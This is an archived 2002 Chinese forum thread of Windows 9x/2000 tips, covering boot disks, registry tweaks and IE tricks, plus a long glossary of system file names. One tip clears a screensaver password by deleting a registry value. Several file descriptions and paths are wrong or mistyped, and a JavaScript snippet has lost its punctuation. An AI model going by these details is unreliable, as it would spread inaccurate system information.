我们都通过“控制面板”中的“添加/删除程序”来制作Windows 98启动盘，但在根本进入不了系统的时候又该怎么办呢？如果系统已经瘫痪无法进入Windows 98的情况下，可在开机自检启动时，按下F8键，进入MS-DOS模式，插入一张软盘进行以下操作就可以创建启动盘了： c:\>format/s/q a: c:\>copy windows\command\edb\*.* a: 复制中提示替换系文件一定要选“NO”，否则制作不成启动盘。这张启动盘含有各种磁盘工具并支持光驱，功能和前述几种方法制成的启动盘完全相同。
33.解除屏幕保护密码（适用Windows 9X/ME/2000）？
如果你忘记了屏保密码怎么办？许多老牌的电脑高手都知道以前在Win 3.xx、Win 95、Win 95a OSR1中可同时按住Ctrl+Alt+Delete，接着再按Ctrl+Esc，这样就可从有密码的屏保中恢复到系统正常状态。不过此招在Win 95 OSR 2.x、Win 98、WinNT 4.0、Win2000中已经失灵，没关系，我们找到了新的方法，它可以完全地将屏保密码删除掉。打开注册表编辑器，找到：HKEY_USERS/.Default/Control Panel/desktop，在右边的窗口找到"ScreenSave_Data"字符串值， 选中并删除它。这样屏保密码就轻松地解除啦！
34.强制退出（适用Windows 9X/ME）？
如果你使用的是Win 9X/ME，那么一定会经常遇到在关机、重启时系统弹出错误信息说：某个程序还在运行，请先关闭所有程序，然后退出Windows，其实这说明某个程序此时正处于锁死状态，致使你无法退出Windows，我们一般情况下会使用“三键解决法”，也就是同时按下Alt + Ctrl + Del，然后点击结束任务来强行关闭锁死的程序，不过我们这里要告诉大家一个更好的解决办法。 打开注册表编辑器，找到：HKEY_CURRENT_USER/Control Panel/desktop，在右边的窗口中找到"AutoEndTasks"字符串，如果你的注册表中没有它，那么可以点右键-->新建-->字符串值，为它起名为： "AutoEndTasks"，双击该字符串，将其值设置为：1，这样即可打开系统的强制结束任务功能。如果你将值设置为：0，那么就是关闭该功能。
35.活用你的IE地址栏？
IE地址栏还有许多用法供大家使用：在地址栏里输入“."即可返回主页。键入“a:”或“C”，C：windows即可返回A盘或C盘。键入“\\局域网计算机名”就可登陆到该计算机的共享文件空间。键入“mailto:ss@163.net”就可以快速打开发邮件窗口。键入“telnet://bbs.szu.edu.cn”就可以登陆BBS系统。键入“ftp://sunrise.szu.edu.cn”就可以登陆FTP系统。
36.提高windows explore的刷新率？
当用户在“资源管理器”中增加或者删除了一个文件夹后，虽可通过按F5键查看最新刷新的结果。但是，每次这样做势必十分麻烦。通过修改注册表可以将刷新达到完全自动化。具体方法是：打开注册表编辑器，找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Update分支，在Update子键中包含一个名叫UpdateMode的键值名，将其键值由01改为00即可。
37.控制IE中“自动完成”的功能？
在IE中填写表格时，通常都会填写一些个人资料要下单购物或是加入会员，当填写到姓名、地址等常常要输入的表格时，IE就会发挥“自动完成”的功能，输入第一个字，后面的字就会自己出现或是以一个下拉列表让使用者选择。
利用注册表编辑器修改这个设定，可以改变自动完成的属性。运行regedit，进入注册表编辑器。找到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoComplete”，修改“Append Completion”为“yes”即可在输入第一个字时，自动将后面的文字补上。默认设置为“no”，当输入第一个字时，会以下拉菜单让使用者选择要以那些字补上。
38.修改我的收藏夹位置？
在windows目录中，有一个Favorites文件夹存放着“我的收藏”文件夹，如果要移动“我的收藏”，只要在IE关闭的状态下，打开资源管理器，对着“\WINDOWS\Favorites”文件夹按 Shift键，再用鼠标左键拖至您欲放置的目录中，就可以移动啦。
删除Windows 2000中可能用不到的全部驱动程序文件
Windows 2000的庞大目录结构，也使得系统所占的空间加大。若你细看，在\WINNT\driver cache\i386目录下，有一driver.cab的压缩文件，大小约52MB，主要是用来放置Windows 2000内置的全部驱动程序，用途是在我们新增设备时，Windows 2000可以自动地从这个压缩文件中提取出相应的驱动程序来进行安装，使用者无需再插入Windows 2000的光盘，若你已确定你的系统不会再变更系统设备时，就可以把driver.cab删除，省下50MB的空间挪做他用。
39.如何加快图片显示？
如何加快图片显示 如何加快图片显示速度一直是我们在设计网页时一个重要的考虑 因素,利用 javascript 也能在一定程度上达到这一目的. script language= javascript !- image1= new image image1.src = 图片名称 image2 = new image image2.src = 图片名称 image3 = new image image3.src = 图片名称 // - /script 怎么样很是方便吧?这样浏览器在装载页面时就已经预先下载了3个图片(image1.gif,images2.gif和image3.gif).当激发onmouseover事件时.
40.巧做完整启动盘？
在安装WINDOWS时，系统会强烈建议你做一张启动盘。但你嫌麻烦，略过该步，如果你现在想做一张完整的启动盘，请把一张软盘插入驱动器。步骤如下：“开始->运行，键入‘C:\windows\command\bootdisk.bat’单击确定，则打开一个DOS窗口。如果是A盘请键入1，如果是B盘，请键入2。然后按任意键开始系统盘制作。制作完成，关闭DOS窗口，然后把C盘根目录下的msdos.sys复制到该软盘，即可。
41.如何修改文件的默认打开方式？
当遇到一个不知道如何打开的文件时，总喜欢用各种程序打开它，但如果忘记将“始终使用该程序打开这中类型的文件”左边的对号去掉，那末以后这类文件都用该程序打开，而不管是否有效。教你一个好方法：打开我的电脑，单击查看菜单中的“文件夹选项”选择“文件类型”，移动滑块在“已注册文件类型”窗口中找到该类型文件的扩展名，选中它，单击删除按钮，并在出现的提示中回答“是”，即可。
42.windows98中误删“显示桌面”功能后的恢复？
打开记事本，建立一个新文件，输入：
[shell]
command=2
iconfile=explorer.exe,3
[taskbar]
Command=toggleDesktop
见文件保存为：“showDesktop.scf",路径为：C:\windows\Application Date\Microsoft\internet Explorer\Quick launch"
不需要重新启动，刷新一下就可以看到“显示桌面”按钮了。

在网上搜集的，不一定全完好使，但也许对你有所帮助！

[这消息被51windows编辑过(编辑时间2002-05-15 07:21:25)]

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-05-14 07:56:06 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
麻烦斑竹置顶一下！
http://www.blueidea.com/user/51windows/tip.htm

超级兔仔的应用
http://www.52nh.com/hw/work/rabbit

[这消息被51windows编辑过(编辑时间2002-05-14 08:02:25)]

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

qiushuiwuhen

秋水无恨
积分：5230
发帖：1247
来自：
注册：2001-12-29
 发表于 2002-05-14 11:10:10 按此观看qiushuiwuhen的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给qiushuiwuhen 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看qiushuiwuhen的IP
补充几点，呵呵

37.控制IE中“自动完成”的功能？
Internet选项->内容->自动完成

41.如何修改文件的默认打开方式？
选定文件，按住shift右键，或shift-F10，
就会有打开方式了，这时候再改也不迟

51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-05-15 07:19:29 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP

A　↑
ACCESS.CHM - Windows帮助文件
ACCSTAT.EXE - 辅助状态指示器
ADVAPI32.DLL - 高级Win32应用程序接口
AHA154X.MPD - SCSI驱动程序
AM1500T.VXT - 网卡驱动程序
AM2100.DOS - 网卡驱动程序
APPSTART.ANI - 动画光标
APPS.HLP - Windows帮助文件
AUDIOCDC.HLP - "易码编码解码器"帮助文件
AWARDPR32.EXE - 增加打印机工具

B　↑
BIGMEM.DRV - BIGMEM虚拟设备
BILLADD.DLL - 动态链接库(支持MSW)
BIOS.VXD - 即插即用BIOS接口
BUSLOGIC.MPD - SCSI驱动程序

C　↑
CALC.EXE - 计算器应用程序
CANNON800.DRV - 佳能打印机驱动程序
CHOICE.COM - MSDOS命令
CHS16.FON - 字体文件(16点阵中文)
CANYON.MID - MIDI文件例子
CARDDRV.EXE - PCMCIA支持程序
CDFS.VXD - CDROM文件系统
CDPLAYER.EXE - CD播放器应用程序
CDPLAYER.HLP - CD播放器帮助文件
CHIPS.DRV - 芯片技术显示驱动程序
CHKDSK.EXE - DOS磁盘检查工具
CHOOSUSR.DLL - 网络客户
CHOKD.WAV - 声音文件例子
CIS.SCP - 脚本文件(演示如何建立与Compuserve的PPP连接)
CLAIRE~1.RMI - MINI序列
CLIP.INF - 安装信息文件(剪粘板查看器)
CLOSEWIN.AVI - 影片剪辑(AVI)(如何关闭窗口)
CMC.DLL:Mail - API1.0公共信息调用
COMBUFF.VXD - COM端虚拟设备
COMCTL32.DLL - 32位Shell组件
COMDLG32.DLL - 32位公共对话库
COMIC.TIF - TrueType字体文件(Comic Sans Ms)
COMMAND.COM - 公共对话库
COMMDLG.DLL - 16位公共对话库
COMMON.HLP - OLE帮助文件
COMPOBJ.DLL - OLE16/32互操作库
CONAGEN.EXE - 32位控制支持
CONFAPI.DLL - Microsoft网络组件
CONFIG.SYS - 配置文件
CONFIG.TXT - 自述文件(配置文件中如何使用命令)
CONTROL.EXE - "控制面板"应用程序
COOL.DLL - 统一资源定位文件
COPY.INF - 安装信息文件
CP-1250.NLS - 自然语言支持文件
CPQNDIS.DOS - 网卡驱动程序
CPQNDIS3.VXD - Compaq以太控制器NDIS驱动程序
CR3240.EXE - DOS6.22中文版CR3240打印机驱动程序
CRTDLL.DLL - Microsoft C运行时间库
CSETUP.EXE - MSDOS6.22中文设置程序
CSETUP.WIN - CSetup.exe支持文件
CSMAPPER.SYS - 系统文件(支持PCMCIA)
CSPMAN.DLL - 动态链接库(SoundBlaster 16 Driver)
CTRLPAN.EXE - MSDOS命令(系统控制台程序)
CTRLPAN.EXE - MSDOS6.22中文版控制程序

D　↑
DBLBVFF.SYS - 双缓冲驱动程序
DC21X4.SYS - NDIS3驱动程序
DCIMAN.DLL - 显示控制接口
DCIMAN32.DLL - 显示控制接口
DDEML.DLL - DDE信息库
DEBMP.DLL - 光栅显示设备
DEBUG.EXE - Debug调试工具
DECPSMW4.INF - 安装信息文件(DEC打印机安装)
DECLAN.VXD - DECLAN网卡驱动程序
DEFRAG - 打开"选定驱动器"窗口
DEL.INF - 安装信息文件
DELTEMP.COM - 初始化帮助工具
DELTREE.EXE - 删除目录工具
DEMET.DLL - 向量显示工程
DESKCP16.DLL - 16位桌面控制面板
DESKTOP.MSN - Microsoft网络组件
DESS.DLL - 表格显示工程
DEWP.DLL - 字处理显示工程
DIALER.CNT - 对话帮助
DIALER.EXE - 电话拨号程序
DIALER.HLP - 电话拨号帮助文件
DIALMON.EXE - 拨号监视程序(IE2.0)
DIBENG.DLL - 独立设备的位同工程
DICONIX.DRX - 打印机驱动
DING.WAN - 声音文件例子
DIRECTCC.EXE - 直接线缆连接应用程序
DISKCOMP - 磁盘比较工具
DISKCOPY.COM - 磁盘拷贝工具
DISKDRV.INF - 安装信息
DISPLAY.TXT - 显示卡README文件
DMCOLOR.DLL - 通用打印驱动程序彩打支持库
DOSKEY.COM - DOS命令
DOSX.EXE - MSDOS配置程序
DRAGDROP.AVI - 影片剪辑(AVI)(如何使用拖拽)
DRIVER.SYS - DOS驱动程序
DRVSPACE.EXE - 磁盘压缩工具
DRVSPACE.HLP - 磁盘空间管理帮助文件

E　↑
EDIT.COM - DOS文字编辑程序
EDLIN.EXE - DOS行编辑器
EE16.VXD - 虚拟设备驱动程序
EISA.VXD - 即插即用EISA总线计数器
EK550C.ICM - 打印机简介
EMM386.EXE - 扩展内存管理程序
ENABLE.INF - 初始化信息
ENGCT.EXE - MSN支持文件
ESCP24SC.DRV - 设备驱动程序
EUDCEDIT.CNF - 帮助索引文件(造字程序)
EUDCEDIT.EXE - 造字程序
EUDCEDIT.HLP - 帮助文件(造字程序)
EUDCEDIT.INF - 安装信息文件(造字程序)
EVX16.DOS - 网卡驱动程序
EWRK3.DOS - 网卡驱动程序
EWRK3.SYS - 网卡驱动程序
EXCEL.XLS - Excel5.0文件模板
EXCEL4.XLS - Excel4.0文件模板
EXCHANGE.TXT - Inbox和Exchange的自述文件
EXCHNG.CNT - Mail/Exchange帮助文件内容
EXCHNG.HLP - Mail/Exchange组件
EXCHNG32.EXE - 对用户的交换机作初始设置
EXPLORER.AVI - 影片剪辑(AVI)(如何使用资源管理器)
EXPLORER.EXE - "资源管理器"应用程序
EXPO.HLP - 帮助文件(产品信息)
EXPOSTRT.EXE - 产品信息应用程序
EXTRACT.EXE - 解压缩工具
EXTRA.TXT - 自述文件(联机访问附加文件)

F　↑
FAQ.TXT - 疑难解答自述文件
FAXCODEC.DLL - 传真编码/译码器
FAXCOVER.EXE - 封面编辑器
FC.EXE - DOS命令,比较两个文件
FD16-700.MPD - SCSI驱动程序
FD8XX.MPD - SCSI驱动程序
FDISK.EXE - DOS命令,在硬盘上建立、删除及显示当前分区
FILESEC.VXD - 文件存取控制管理器
FILEXFER.CNT - 文件传输帮助文件内容
FILEXFER.EXE - Microsoft文件传输
FIND.AVI - 影片剪辑(如何使用查找)
FIND.EXE - 寻找指定字符串命令
FINDMVI.DLL - 媒体视觉支持
FINSTALL.DLL - 字库安装程序
FINSTALL.HLP - 字库安装帮助文件
FLSIMTD.VXD - PCMCIA支持
FLSIMTD.VXD - PCMCIA支持
FONT16.EXE - DOS6.22中文版16点阵字体驱动程序
FONTS.INF - 字体选择初始化信息
FONTVIEW.EXE - 字体浏览程序
FORMAT.COM - DOS磁盘格式化工具
FOUTLINE.EXE - 轮廓字体驱动程序
FRAMEBUF.DRV - SVGA显示器驱动程序
FTE.DLL - 声音浏览文件传输工程文件
FTP.EXE - 文件传输协议TCP工具
FURELI~1.RMI - MINI序列

G　↑
GBK.TXT - 中文Windows95GBK代码集字符定义表
GDI.EXE - 简版WIN3.1图形界面
GDI32.DLL - 32位GDI图形界面
GENERAL.IDF - 一般MIDI指示器
GRPCONV.EXE - Windows程序组转换器
GUIDE.EXE - 应用程序(MSN)

H　↑
HARDWARE.TXT - 硬件自述文件
HOSTS.SAM - TCP配置
HPCLRLSK.ICM - 打印简介
HPDESK.ICM - 打印机简介表
HPDSKJET.DRV - 打印机驱动程序
HPEISA.VXD - 网络适配器驱动程序
HPJAHLP.CNT - JetAdmin程序帮助文件
HPJD.DLL - HPJetAdmin支持程序
HPLAN.DOS - 网络适配器驱动程序
HPLJ300.DRV - HPLJ300DPI打印机驱动程序
HPLJ300.EXE - MSDOS命令(HP打印机驱动)
HPLJ-31.SPD - 打印机驱动程序
HPLJ600.DRV - HPLJ600DPI打印机驱动程序
HPLJP-V4.INF - 打印机安装信息
HPNETPRN.INF - HPJetAdmin支持程序
HPPJXL31.SPD - 打印机驱动程序
HPPLOT.DRV - 打印机驱动程序
HPPLOT.HLP - 打印机驱动程序帮助文件
HPPRARBK.DLL - HPJetAdmin支持程序
HPPRARRK.HLP - HPJetAdmin支持程序帮助文件
HPVCM.HPM - 打印机驱动程序
HSFLOP.PDR - HSFLOP虚拟设备
HTICONS.DLL - 终端设备动态链接库
HYPERTRM.CNT - 终端设备帮助文件
HYPERTRM.EXE - 终端设备应用程序
HYPERTRM.HLP - "超级终端"帮助
HZKBD.EXE - 常用输入方法程序
HZVIO95.EXE - 显示驱动程序

I　↑
I82593.DOS - 网络适配器驱动程序
IB401917.SPD - 打印机驱动程序
IBM20470.SPD - 打印机驱动程序
IBM20K.DOS - 网络适配器驱动程序
ICM32.DLL - 图象颜色匹配程序
ICMOI.DLL - 用户界面颜色匹配程序
ICONLIB.DLL - 图符库
IEXPLORE.CNT - 帮助索引文件(IE)
IEXPLORE.EXE - InternetExplore
IEXPLORE.HLP - 帮助文件(IE)
IFSHLP.SYS - 文件系统安装帮助文件
IFSMGR.VXD - 文件系统安装管理程序
IMAGEOIT.EXE - 图象编辑器光标程序
IMCLIENT.DLL - Microsoft网络组件
IME.CNT - 帮助索引文件(中文输入法)
IME.HLP - Windows帮助文件
IME.INF - 安装信息文件(中文输入法)
IMEGEN.CNF - 帮助索引文件(输入法生成器)
IMEGEN.EXE - 输入法生成器
IMEGEN.HLP - 帮助文件(输入法生成器)
IMEINFO.INI - 输入法初始化文件
IMM32.DLL - WIN32IMM应用程序界面
INBOX.EXC - 邮件组件
INDICDLL.DLL - 多语言组件
INET.TXT - IE自述文件
INET16.DLL - 动态链接库(支持IE2.0)
INETAB32.DLL - 动态链接库(支持Internet mail)
INETCFG.DLL - 动态链接库(支持IE2.0)
INETCPL.CPL - 控制面板文件(配置IE2.0)
INETMAIL.INF - 安装信息文件(Internet mail)
INETWIZ.EXE - Internet安装向导
INFORMS.WPF - 样板文件
INSTBE.BAT - Microsoft网络组件
INSTDICT.EXE - MSDOS命令(输入法安装程序)
INTB.VXD - 13号中断虚拟设备
INTL.CPL - 控制面板
INT-MAIL.CNT - 帮助索引文件(Internet mail)
IOS.INI - 设置需要安全保护的程序
IOSCLASS.DLL - CDROM安装程序
IRMATR.DOS - 网络适配器驱动程序
ISAPNP.VXD - ISA总线即插即用程序
JOY.CPL - 游戏杆控制面板
JOYSTICK.INF - 多媒体安装信息
JP350.DRV - 打印机驱动程序
JUNGLE~1.WAV - 声音文件

K　↑
KBDBE.KBD - 比利时键盘格式
KBDBR.KBD - 巴西键盘格式
KBDCA.KBD - 法国、加拿大键盘格式
KBDOS.KBD - 美国键盘格式
KDCOLOR1.SPD - 打印机驱动程序
KERNEL32.DLL - 32位内核
KEYB.COM - 将控制键盘程序装入内存
KODAKCE.ICM - 柯达ICC配置文件
KRNL386.EXE - Core应用程序

L　↑
LABEL.EXE - DOS命令,设置磁盘名称
LFNBK.EXE - 长文件名备份文件
LFNBK.TXT - LFNBK的自述文件
LICENSE.HLP - Windows帮助文件
LMSCRIPT.EXE - LAN管理器文稿处理程序
LOGIN.EXE - Win95登录NetWare文件
LQ1600K.EXE - LQ1600K打印驱动程序

M　↑
MAILMSG.DLL - 微软网络组件
MAILOPT.INF - MAIL/MAPI设置文件
MAPI.DLL - Mail/Exchange组件
MCIAVI.DRV - 多媒体驱动程序
MCICDA.DRV - MCICD声音驱动程序
MCIOLE.DLL - MCIOLE句柄
MCIPIONR.DRV - MCI光盘驱动程序
MCISEQ.DRV - MCI定序器驱动程序
MCIVISCA.DRV - MCIVCR驱动程序
MCIWAVE.DRV - MCI Ware驱动程序
MDMNOKIA.INF - 安装信息文件(modem)
MDMNOVA.INF - 安装信息文件(modem)
MDMVV.INF - 安装信息文件(modem)
MEMMAKER.EXE - 内存管理程序
MEMMAKER.INF - 内存管理程序设置信息
MFCUIA32.DLL - OLEI公共对话动态链接库
MIDI.INF - 即插即用MIDI设备信息
MINET32.DLL - 支持Internet Mail动态链接库
MKECR5XX.MPD - SCSI驱动程序
ML3XEC16.EXE - 应用程序(MAPI)
MLSHEXT.DLL - 微软核扩展库
MMCI.DLL - 媒体类安装程序
MMDEVLDR.VXD - 即插即用设备装载程序
MMDRV.HLP - 多媒体帮助文件
MMSOUND.DRV - 多媒体驱动程序
MMSYSTEM.DLL - 多媒体系统内核
MMTASK.TSK - 多媒体背景任务交换器
MODE.COM - DOS命令
MODERN.FON - 字体文件(modem)
MORE.COM - DOS命令
MOUSE.DRV - 鼠标驱动程序
MOVEWIN.AVI - 影片剪辑(如何移动窗口)
MPLAYER.EXE - 媒体播放程序
MPR.DLL - WIN32网络接口动态链接库
MSAB32.DLL - 微软网络地址簿
MSBASE.INF - 设置信息
MSCDEX.EXE - DOS MSCDEX CDROM扩展工具
MSCDROM.INF - 类安装设置信息
MSD.EXE - 微软诊断工具
MSD.INI - 微软诊断初始化
MSDET.INF - 系统检测设置信息
MSDISP.INF - 显示设置信息
MSDLG.EXE - 数据链接控制协议
MSDOS.INF - 设置信息
MSDOSDRV.TXT - 设备驱动程序自述文件
MSFT.VRL - 统一资源定位文件
MSGSRV32.EXE - Windows32位虚拟设备信息系统
MSHDC.INF - 硬盘控制设置信息
MSJSTICK.DRV - 即插即用游戏杆驱动程序
MSMAIL.INF - Mail/MAPI初始化
MSMOUSE.INF - 鼠标设置信息
MSN.TXT - 微软网络自述文件
MSNET32.DLL - 微软32位网络API库
MSNEXCH.EXE - 微软网络设置程序
MSNPSS.HLP - 微软网络帮助文件
MSNVER.TXT - 微软网络帮助信息
MSPAINT.EXE - 画图工具
MSPCIC.DLL - PCMCIA类安装与控制工具
MSPORTS.INF - 公共设置信息
MSPP32.DLL - 微软网络打印支持程序
MSPWL32.DLL - 口令清单管理库
MSSBLST.DRV - 声霸卡驱动程序
MSSBLSI.VXD - 声霸卡驱动程序
MSSHRVI.DLL - 共享内核扩展程序
MSSNDSYS.DRV - Windows声音系统驱动程序
MSSP.VXP - Windows NT安全支持
MSTCP.DLL - TCP用户界面
MSVIEWUT.DLL - 显示设备服务数据链接库
MTMMINIP.MPD - SCSI驱动程序
MULLANG.INF - 多种语言字体支持设置信息
MVIWAVE.DRV - 声音驱动程序

N　↑
NBTSTAT.EXE - TCP工具
NDDEAPI.DLL - Workgroups DDE共享接口
NDDENB.DLL - 微软网络DDE NetBIOS接口
NDISHLP.SYS - 实模式NDIS支持驱动程序
NET.EXE - 实模式网络客户软件
NET.INF - 网络检测信息
NET.MSG - 网络客户信息
NET3COM.INF - 网络设置信息
NETAMD.INF - 网络设置信息
NETAPI.DLL - 网络应用程序接口动态链接库
NETAPI32.DLL - 32位网络API动态链接库
NETAVXT.INF - MS内部传输文件
NETBEUI.VXD - 32位NetBEUI协议
NETBIOS.DLL - NetBIOSAPI库
NETDCA.INF - 安装信息文件
NETDDE.EXE - Windows网络动态数据交换
NETDET.INI - NetWare检测文件
NETDI.DLL - 网络设备安装
NETH.MSG - 网络客户帮助信息
NETOS.DLL - NOS检测DLL
NETWATCH.EXE - 网络观测程序
NETWORK.TXT - 网络信息自述文件
NOTEPAD.EXE - 记事本应用程序
NODRIVER.INF - 即插即用设备信息
NOTEPAD.EXE - NOTEPAD文件
NSCL.VXD - NSCL虚拟设备
NW16.DLL - NetWare客户
NWAB32.DLL - 地址簿支持动态链接库
NWLSCON.EXE - 登录文稿控制台程序
NWLSPROC.EXE - NetWare登录处理器
NWNET32.DLL - NetWare客户
NWNP32.DLL - NetWare组件
NWREDIR.VXD - NetWare重定向
NWSERVER.VXD - NCP服务
NWSP.VXD - NCP服务安全提供

O　↑
OEMREVA.INF - 安装信息文件
OLE2.DLL - OLE2.0动态链接库
OLE2.INF - OLE设置信息
OLE32.DLL - 32位OLE2.0组件
OLEAUT32.DLL - OLE2-32自动化
OLECL1.DLL - 对象链接与嵌入客户库
OLEDLG.DLL - Windows OLE2.0用户接口支持
OLESVR.DLL - 对象链接与嵌入服务端库
OLETHK32.DLL - OLE形实替换程序库

P　↑
PACKAGER.EXE - 对象包装程序
PARALINK.VXD - 远程网络存取并行口驱动程序
PBRVSH.EXE - "画图"应用程序
PDOS95.BAT - 进入中文DOS状态
PERF.VXD - 系统性能监视器
PIFMGR.DLL - 程序信息文件管理服务程序
PING.EXE - TCPPing工具
PMSPL.DLL - LAN管理应用程序接口
POWER.DRV - 高级电源管理驱动程序
PPPMAC.VXD - Windows虚拟PPP驱动程序
PRINT.EXE - DOS打印文件
PRINTERS.TXT - 打印信息自述文件
PROGMAN.EXE - 程序管理器
PRTVPD.INF - 打印机升级设置信息

Q　↑
QUIKVIEW.EXE - 快速查看
QUIT.EXE - 退出中文DOS状态

R　↑
README.TXT - Windows95自述文件
REGEDIT.EXE - 注册编辑器
REGSERV.EXE - 远程注册
REGWIE.EXE - 注册工具
REGSERV.INF - 远程注册
RESTORE.EXE - DOS命令
RNAAPP.EXE - 拨号网络应用程序
RNASERV.DLL - 远程网络存取服务
RNASETUP.DLL - 远程网络存取设置动态链接库
RNATHUNK.DLL - 远程网络存取转换支持动态链接库
RNAUI.DLL - 远程网络存取用户接口DLLRNDSRV32.DLL复制服务程序
ROBOTZCL.WAV - 声音文件
ROBOTZWI.WAV - 声音文件
ROMAN.FON - 字型文件
ROUTE.EXE - TCP/IP ROUTE命令
RPCLTC1.DLL - 远程调用库
RPCNS4.DLL - 远程调用库
RPCPP.DLL - 远程调用打印驱动
RPCRT4.DLL - 远程调用库
RPCSS.EXE - 远程调用结点映象
RPLBOOT.SYS - 远程程序装入
RPLIMAGE.DLL - 远程程序装入磁盘映象器
RSRC16.DLL - 资源计量器
RSRCMTR.EXE - 资源计量器
RSRCMTR.INF - 资源计量器
RUMOR.EXE - DDE测试/游戏
RUNDLL.EXE - 把DLL作为应用程序运行
RUNDLL32.EXE - 32位壳组件
S3.DRV - S3显示驱动
S3.VXD - S3虚拟设备
SACLIEN.DLL - Microsoft网络组件
SAMPLEVIDEOS - 图象文件
SAPNSP.DLL - Winsock数据连接库
SAVE32.COM - 安装时所需的TSR文件
SB16.VXD - 16位声卡虚拟设备
SB16SND.DRV - 16位声卡驱动
SBAWE.VXD - AWE声卡虚拟设备
SBAWE32.DRV - AWE声卡驱动
SBFM.DRV - 16位声卡驱动
SCANDISK.BAT - MSDOS6.x Scandisk的替代存根模块SCANDISK.BAT磁盘诊断工具
SCANDISK.INI - 磁盘诊断工具
SCANDISK.PIF - 安装磁盘诊断工具时的PIF文件
SCANDSKW.EXE - 磁盘扫描工具
SCANPROG.EXE - 磁盘扫描工具
SCRNSAVE.SCR - 屏幕保护
SCSI.INF - SCSI安装文件文件名描述
SCSIIHLP.VXD - SCSI支持文件
SCSIPORT.PDR - SCSI虚拟设备口
SECUR32.DLL - Microsoft Win32安全服务
SECURCL.DLL - Microsoft网络组件
SEIKO24E.DRV - 打印机驱动
SEIKOSH9.DRV - 打印机驱动
SERIAL.VXD - 串口VCOMM驱动器
SERIFE.FON - 字型文件
SERVER.HLP - 服务器帮助文件
SETMDIR.EXE - SBS文件
SETUP.BIN - 安装支持文件
SETUP.BMP - 安装Wash位图文件
SETUP.EXE - Windows95安装程序
SETUP.INF - 安装信息文件
SETUP.TXT - 安装时的README文件
SETUP4.DLL - 安装支持文件
SETUPPP.INF - 安装信息
SETUPX.DLL - 安装支持
SETVER.EXE - MSDOS版本显示,该程序可在网络上执行
SF4029.EXE - 打印机驱动
SHARE.EXE - MSDOS共享实用程序
SHELL.INF - 安装壳信息
SHELL.VXD - 虚拟壳设备
SHELL2.INF - 颜色组合
SHELL3.INF - 颜色组合
SIZE1-1.CUR - 光标
SIZE1-M.CUR - 光标
SIZE4-M.CUR - 光标
SIZENESW.ANI - 活动光标
SIZEWE.ANI- 活动光标
SKPSFA-1.SPD - 打印机驱动
SLAN.DOS - 网络适配器驱动
SLCD32.MPD - SCSI驱动器
SLENH.DLL - 高级节能选项
SMALLE.FON - 字型文件
SMALLF.FON - 字型文件
SMARTDRV.EXE - 超高速缓存程序
SMARTND.DOS - 网络适配器驱动器
SMC3000.DOS - 网络适配器驱动器
SMC9000.VXD - 网络适配器驱动器
SNAPSHOT.EXE - 抽点
SNAPSHOT.VXD - 抽点虚拟设备
SNDREC32.EXE - 录音机
SNIP.VXD - 网络适配驱动器
SOCKET.VXD - Windows虚拟Socket网卡驱动器SOCKET.VXD PCMCIA支持
SOL.CNT - 纸牌游戏
SOL.HLP - 纸牌游戏帮助文件
SORT.EXE - MSDOS分类实用程序
SOUNDREC.CNT - 录音机帮助文件内容
SOUNDREC.HLP - 录音机帮助文件
SPARROW.WPD - SCSI驱动器
SPARROWX.MPD - SCSI驱动器
SPOOL32.EXE - 打印机支持
SPOOLER.VXD - 打印机共享虚拟设备
SRAMMTD.VXD - PCMCIA支持
SSERIFE.FON - 字型文件
SSERIFF.FON - 字型文件
SSFLYWIN.SCR - 屏幕保护
SSSTARS.SCR - 屏幕保护
STAR24E.DRV - 打印机驱动
STAR9E.DRV - 打印机驱动
START.EXE - 启动程序
STATE.PBK - Microsoft网络组件
STDOLE.TLB - OLE2.0文件
STDOLE32.TLB - OLE2-32文件
STEMO409.DLL - Windows95帮助文件的DLL
STLSO4SS.SPD - 打印机驱动程序
STLS577U.SPD - 打印机驱动程序
STORAGE.DLL - OLE存储器管理库
STRN.DOS - 网络适配器驱动
SUBST.EXE - MSDOS Subst实用程序
SUEXPAND.DLL - LZ DLL安装
SUHELPER.BIN - 安装支持
SUPERVGA.DRV - 高级VGA显示驱动
SURPORT.TXT - PSS支持信息
SVCPROP.DLL - Microsoft网络组件
SVRAPI.DLL - 32位公用服务器API实用程序
SXCIEXT.DLL - Matrox显示驱动支持文件
SYMBOLE.FON - 字型文件
SYS.COM - MSDOS系统实用程序
SYSCLASS.DLL - 系统类库安装
SYSDETMG.DLL - 系统检测库
SYSEDIT.EXE - 系统编辑器
SYSLOGO.RLE - 系统标识
SYSMON.EXE - 系统监控程序
SYSMON.HLP - 系统监控帮助
SYSTEM.DRV - 最小Win3.1标准模式
SYSTHUNK.DLL - Windows系统形实替换程序库
SYSTRAY.EXE - 高级节能管理

T　↑
T128.MPD - SCSI驱动器
T160.MPD - SCSI驱动器
T20N3.VXD - 网络适配驱动器
T30ND.DOS - 网络适配驱动器
T338.MPD - SCSI驱动器
TADA.WAV - 声音文件
TAPI.DLL - API通话程序
TAPI.INF - API通话安装信息文件
TAPI32.DLL - 32位形实替换
TAPIADDR.DLL - API通话程序
TAPIEXE.EXE - API通话组件
TAPIINI.EXE - API通话组件
TASKMAM.EXE - 任务管理器
TCCARC.DOS - 网络适配驱动器
TCTOKCH.VXD - 网络适配驱动器
TELEPHON.CPL - 通话帮助
TESTPS.TXT - PostScript测试
TEXTCHAT.EXE - Microsoft网络组件
THEMIC-1.WAV - 声音文件
